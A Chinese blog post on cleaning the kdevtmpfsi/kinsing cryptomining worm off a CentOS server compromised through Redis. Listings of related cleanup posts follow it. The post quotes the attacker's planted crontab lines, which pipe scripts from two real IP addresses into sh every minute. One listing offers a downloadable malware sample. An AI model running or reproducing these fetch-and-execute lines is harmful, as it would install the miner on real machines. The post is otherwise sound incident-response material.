kdevtmpfsi 处理(挖矿病毒清除)

已于 2023-09-16 21:37:17 修改
阅读量8.1k 收藏 19
点赞数 8
文章标签: linux
于 2022-04-26 23:21:44 首次发布

问题描述:

Linux Centos 7 环境下的一台服务器CPU直接被打满,上服务器 top 命令看到了一个未知的 kdevtmpfsi 疯狂占用中,情况如下图:

网上搜索了一下 kdevtmpfsi 是一个挖矿病毒,大多数都是 redis 程序侵入,而且受害者还不少,通常比较明显就是 占用高额的CPU、内存资源。

问题原因:

阿里云公布的威胁快报:https://yq.aliyun.com/articles/741602

Redis RCE导致h2Miner蠕虫病毒,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。在以往常见的攻击者或蠕虫中,其大多都沿用登陆redis后写入定时任务或写ssh key的方式进行入侵,这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis加载module的攻击方式,可以直接执行任意指令或拿到shell交互环境,危害极大。

问题解决:

第一步cd 命令切换到自己 Redis 的安装目录下,然后删除该目录下的 red2.so 文件以及以 kinsing 开头的所有文件。

第二步crontab -l 命令先看看 crontab 的定时任务列表

[root@VM-0-9-centos /]# crontab -l
* * * * * wget -q -O - http://91.241.20.134/scg.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://185.191.32.198/scg.sh | sh > /dev/null 2>&1

因为我这台服务器根本没设置过 crontab 定时任务,而且这是两个国外(伊朗,俄罗斯)的陌生IP,所以可以断定这就是罪魁祸首。

第三步crontab -e 命令进行定时任务编辑(该步骤很重要),去除陌生的定时任务(要求在root用户下),在打开的文本中,按 i 进行编辑删除,编辑完后按Esc退出键退出编辑,再输入 :wq 强制性写入文件并退出。

[root@VM-0-9-centos /]# crontab -e

第四步ps -ef|grep kdevtmpfsi  命令查看 kdevtmpfsi 的进程,并且使用 kill -9 PID 杀死kdevtmpfsi 对应的进程

[root@VM-0-9-centos /]#  ps -ef |grep kdevtmpfsi
root     40422     1 99 10:16 ?        01:01:16 /tmp/kdevtmpfsi
root     60879 60813  0 10:24 pts/4    00:00:00 grep --color=auto kdevtmpfsi
[root@VM-0-9-centos /]# 
[root@VM-0-9-centos /]#  kill -9 40422
[root@VM-0-9-centos /]#

第五步ps -ef|grep kinsing  命令查看kdevtmpfsi程序的守护进程kinsing  ,并且使用 kill -9 PID 杀死对应的进程

[root@VM-0-9-centos /]#  ps -ef |grep kinsing
root     38560     1  0 10:15 ?        00:00:01 /var/tmp/kinsing
root     62455 60813  0 10:26 pts/4    00:00:00 grep --color=auto kinsing
[root@VM-0-9-centos /]# 
[root@VM-0-9-centos /]#  kill -9 38560
[root@VM-0-9-centos /]#

第六步find / -iname kdevtmpfsi 命令再次确定kdevtmpfsi文件所在位置以便删除,使用 rm -rf 所在位置 删除 kdevtmpfsi 程序

[root@VM-0-9-centos /]# find / -iname kdevtmpfsi
/tmp/kdevtmpfsi
[root@VM-0-9-centos /]# rm -rf /tmp/kdevtmpfsi
[root@VM-0-9-centos /]#

第七步find / -iname kinsing 命令再次确定 kinsing 文件所在位置以便删除,使用 rm -rf 所在位置 删除 kdevtmpfsi 程序

[root@VM-0-9-centos /]# find / -iname kinsing
/var/tmp/kinsing
[root@VM-0-9-centos /]# rm -rf /var/tmp/kinsing
或者像第一步一样(删除kinsing开头全部相关文件)
[root@VM-0-9-centos /]# find / -name "kinsing*" | xargs rm -rf

   

 第八步cat ~/.ssh/authorized_keys 查看是否有陌生的的公钥,有则删除掉,

 

 

问题防护
 

  • 把异常的IP地址,入站及出站全部封禁
  • 不定期更新 Redis 服务密码,禁止使用默认端口,非必要不暴露在公网或绑定指定IP
  • 启用ssh公钥登陆,禁用密码登陆。
  • 完善安全策略,入口流量,非必要一般只开放 80 443 端口就行,出口流量默认可以不限制,如果有需要根据需求来限制。
  • 防火墙能用的尽量用起来,有条件可以上付费的。
 

 

经过几天的观察,服务器运行正常。
 

 

原文链接:kdevtmpfsi 处理(挖矿病毒清除)
 

 


                

        

        

    

  


    

      

        

            

              
                
                  Ancoda安可达
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
挖矿僵尸网络蠕虫病毒——kdevtmpfsi处理过程及数据库

				
			

			

				

					HackGJN的博客
				

				

					09-27
					
					652
					
				

			

		

		

			
				
其中,kdevtmpfsi是一种特别具有挑战性的病毒,它利用系统中的kdevtmpfsi进程进行挖矿活动,并且具有自我复制和传播的能力。隔离和停止传播:为了防止病毒进一步传播和感染其他系统,对受感染的主机进行隔离是必要的。日志和审计:数据库可以记录系统的日志和审计信息,包括病毒活动的时间、位置和影响范围等。系统修复和加固:一旦病毒清除,需要对受感染的系统进行修复和加固,以防止未来的攻击。通过使用数据库中的数据,网络管理员可以确保系统中的所有组件都是最新的,从而减少病毒入侵的风险。

			
		

	



                

            
              



	

		

			

				
					
病毒】【CPU使用率为100%】Linuxkdevtmpfsi 挖矿病毒入侵

				
			

			

				

					走在搬砖的路上!
				

				

					11-17
					
					1202
					
				

			

		

		

			
				
重新安装redis(千万不要赋予root权限)服务,根据客户实际需要对特定IP开放端口(利用防火墙设置,尤其是必须对外(公网)提供服务的情况下),如果只是本机使用,绑定127.0.0.1:6379 ,增加认证口令。最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。crontab -r 表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。

			
		

	



              


  
              

                


	

		

			

				
					
清理kdevtmpfsi、dbused挖矿木马程序

				
			

			

				

					qq_42672132的博客
				

				

					08-24
					
					752
					
				

			

		

		

			
				
一、出现的问题
今天早上一看服务器集群,cpu被占满,Hadoop集群被干爆,然后top一下,看到占用最高的是kdevtmpfsi,另一个节点是dbused占满。
搜了一下,都是挖矿程序。
二、解决思路
网上很多的方法都试了,但是挖矿进程还是不断重启。像
1、关闭守护进程(后面没有守护进城了,木马进程还是会重启)
2、删除/tmp/下相关的文件(看名字,和木马进程差不多)
3、删除crontab内容(会被植入定时程序,我关闭了crontab,但是木马程序依旧重启)
4、修改木马文件权限(会换个名字继续来,原

			
		

	





	

		

			

				
					
kdevtmpfsi挖矿病毒,反复启动,守护进程kinsing害人不浅,一次彻底删除

				
			

			

				

					m0_37587869的博客
				

				

					01-04
					
					3216
					
				

			

		

		

			
				
最近照例巡检服务器情况,当看到cup 直接飙到100%,像脉搏监视器检测到人没有心跳了一样,全是直线,吓我一身冷汗,预感大事不妙!继续查看发现是一周前19点左右开始的,这就很奇怪,cpu 跑100%,商城竟然没有挂掉(虽然是地方小商城,但用户量也有10万加,要是挂了后果不堪设想),真是不幸中的万幸。发现是中了木马,有人在服务器上挖矿kdevtmpfsi。然后百度了一圈,下面综合各位大神的办法,最终解决,总结一下
1.首先,top 了下系统进程

2.接着输入命令 systemctl status 12625

			
		

	



		

			
		



	

		

			

				
					
pg kdevtmpfsi挖矿病毒处理

					
最新发布

				
			

			

				

					weixin_46551671的博客
				

				

					09-13
					
					282
					
				

			

		

		

			
				
自己用废弃笔记本做了一个本地pg数据库,但是某一天笔记本风扇飞转,对于平时不怎么使用的服务器来说,这是一件很神奇的事情。top一下,好家伙,postgres有一个进程cpu给我感到了300多,进程名字kdevtmpfsi

			
		

	





	

		

			

				
					
kdevtmpfsi 挖矿病毒清除

				
			

			

				

					u010227042的博客
				

				

					03-11
					
					1058
					
				

			

		

		

			
				
保险:如果CPU还是高速运转,你只需重复第一步即刻,因为它的威胁文件被我删除了,如果还在跑我们清理。这个病毒大多数都是通过你的redis 程序侵入的,你只需要配置,所以你要配置你的redis配置文件。crontab -r //表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。这个病毒会在你的主机密钥中加入他们的公钥,这是他们留了后门的钥匙,可以免密登录你的电脑。vim ~/.ssh/authorized_keys  //打开文件后删除不认识的公钥。进程,就不会再有了,

			
		

	





	

		

			

				
					
清除挖矿病毒 kdevtmpfsi记录

				
			

			

				

					第一天
				

				

					05-17
					
					405
					
				

			

		

		

			
				
某日登录服务器,查看到cpu使用异常
负载很高

查看下cpu进程使用情况

kdevtmpfsi 这个进程使用异常
28243 polkitd   20   0 2915868   2.3g      0 S 193.0 29.9 673812:14 kdevtmpfsi   

ps aux 查看下这个进程的路径

kill -9 28243  删除进程
查看是否存在定时任务
https://blog.csdn.net/qq_45186545/article/details/103853601
http

			
		

	





	

		

			

				
					
Linux服务器kdevtmpfsi挖矿病毒解决方法:治标+治本

					
热门推荐

				
			

			

				

					Cupster
				

				

					02-25
					
					4万+
					
				

			

		

		

			
				
问题描述

Linux服务器(包括但不限于CentOS)出现名为kdevtmpfsi的进程,占用高额的CPU、内存资源;
并且单纯的kill -9 进程ID  例:kill -9 23455无法完全杀死,不久便会复活;
同2.理杀死 kdevtmpfsi的守护进程kinsing,一小段时间又会出现这对进程;
找到并删除这2个进程对应的可执行文件例:find / -name kinsing,一小段时......

			
		

	





	

		

			

				
					
linux如何清理挖矿程序,如何彻底清除kdevtmpfsir挖矿程序 ?

				
			

			

				

					weixin_30019895的博客
				

				

					05-07
					
					1698
					
				

			

		

		

			
				
首先说说我的处理过程:第一步就是找到可耻的程序文件并且删掉find / -name kdevtmpfsifind / -name kinsingrm -f /var/lib/docker/overlay2/587d73c3e9c50829c7842ba777d834e5bf3dca6897e98eba02b85eeb4e5d1eb6/diff/tmp/kdevtmpfsirm -f /var/li...

			
		

	





	

		

			

				
					
php+挖矿病毒,Kdevtmpfsi 挖矿病毒处理方式

				
			

			

				

					weixin_42165712的博客
				

				

					03-11
					
					651
					
				

			

		

		

			
				
中毒线上状态:CPU占满90%+,引发线上服务处理异常缓慢等问题,从而导致业务异常。处理方法:1. 查看占用高的进程。# top2. 排序按下1,找到占用高CPU的进程后,Ctrl+z退出。3. 查找对应的进程号。(可以使用pgrep来更加精确查询)# ps -aux | grep kdevtmpfsi# ps -aux | grep kinsing4. 杀掉该进程。# kill -9 12739...

			
		

	





	

		

			

				
					
kdevtmpfsi 挖矿病毒清除(亲测)

				
			

			

				

					逸雅安然
				

				

					07-07
					
					4375
					
				

			

		

		

			
				
废话不多说,直接开始清理

找到矿毒进程

ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi



杀死进程:

kill -9 PID (杀死两个)


删除Linux下的异常定时任务

crontab -l //查看定时任务
crontab -r //表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除


删除文件

rm -rf kdevtmpfsi 
rm -rf /var/tmp/kinsing  
最后自己可以再检查一下是否还有

			
		

	





	

		

			

				
					
kdevtmpfsi样本.zip

				
			

			

				

					03-16
				

			

		

		

			
				
kdevtmpfsi样本,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可

			
		

	





	

		

			

				
					
linux kdevtmpfsi 挖矿病毒处理

				
			

			

				

					qq_16642919的博客
				

				

					02-26
					
					509
					
				

			

		

		

			
				
linux kdevtmpfsi 挖矿病毒处理病毒表现新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入
病毒表现

你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编

			
		

	





	

		

			

				
					
kdevtmpfsi挖矿病毒中招与破解

				
			

			

				

					永远sayYES的博客
				

				

					09-18
					
					3112
					
				

			

		

		

			
				
一、背景
1. 本人是一名程序员,主要负责后端开发,已经做了10多年程序员了。
2. 本人有一台ECS服务器,在腾讯云上双11买的,2C4G + 5M带宽三年话费1000不到。
3. 平时自己喜欢在上面搭建一些服务玩玩。

二、发现

有一天我在上面安装了hadoop玩,需要创建一个hadoop账号,并且给用户hadoop创建了一个简单的密码hadoop123(我真的是太懒了),同时开放了22端口的ssh服务(HDFS免密登录需要),第二天发现登录ECS机器异常卡顿,敲命令也延迟的厉害。直觉告诉我应该是我电

			
		

	





	

		

			

				
					
挖矿kdevtmpfsi病毒处理

				
			

			

				

					感冒石头的博客
				

				

					05-14
					
					1041
					
				

			

		

		

			
				
通过top命令可以看到kdevtmpfsi导致CPU 700%多,导致该病毒只要是通过redis漏洞进来的。1、该病毒还有守护进程,如果光kill掉该病毒,过段时间又起来的。守护进程:kinsing
2、该病毒还有定时任务、如果光杀死kdevtmpfsi和kinsing没有用,定时任务会再度重启这两个进程。解决办法:1、设置redis只对当前服务器或者指定服务器放开。取消掉 bind 0.0.0.0 设置 bind 127.0.0.1 或者加其他ip ,2、crontab -l  ----》可以在...

			
		

	





	

		

			

				
					
【应急响应】kdevtmpfsi挖矿病毒紧急处置

				
			

			

				

					m0_74272345的博客
				

				

					12-15
					
					603
					
				

			

		

		

			
				
师姐刚买的阿里云被种了kdevtmpfsi挖矿木马,贴点聊天记录(哈哈哈哈哈哈哈哈哈哈哈)说实话以前都是看过一些博客、推送,只是知道有挖矿木马这个东西,也没有接触过应急响应,全程是以最近打渗透学到的东西来摸索的第一次真的遇到还挺激动的,处理完发现其实也没太难,就是途中走了很多弯路,但曲折才能进步嘛,所以把弯路也做个记录同时是两条线在做,师姐在找杀毒软件,我在手动处理

			
		

	





	

		

			

				
					
CentOS中kdevtmpfsi病毒

				
			

			

				

					jinglinggg的专栏
				

				

					12-06
					
					1375
					
				

			

		

		

			
				
CentOS中kdevtmpfsi病毒,几日的查杀,最终失败!

			
		

	





	

		

			

				
					
针对kdevtmpfsi病毒内容的分析与清理

				
			

			

				

					a1308422754的博客
				

				

					12-28
					
					3万+
					
				

			

		

		

			
				
中毒症状:

服务器cpu负载升高  top查看进程 会发现一个名为kdevtmpfsi 的程序在占用
杀掉之后重启可以推测有守护进程 排查后守护进程为kinsing
杀掉守护进程 间隔一会又重新启动  定时任务中有每秒都在执行的脚本 要删掉
间隔一星期或者两个星期又卷土重来





建议
挖矿程序可以通过docker镜像下载服务和redis 动态加载配置 获取主机权限
1、平时中间件要绑定内网网卡,禁止bind 0.0.0.0的情况出现
2、用低权限用户启动
3、统一更换常用端口
4、redis设置2.

			
		

	





	

		

			

				
					
记录kdevtmpfsi病毒

				
			

			

				

					挥起镰刀的博客
				

				

					05-27
					
					1368
					
				

			

		

		

			
				
2021-5-26日,通过IDEA2020中的Docker插件来连接腾讯云服务器。由于开放了2375端口,并未做任何安全配置,中了挖矿病毒kdevtmpfsi。

使用 kill 命令可以将程序终止,但是Root的大部分命令权限被黑,已经无法操作,尚未解决。

通过docker中的不明容器可以判断,确实是通过docker进入的

由于百度解决未果,只能备份数据后重装系统。。

...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值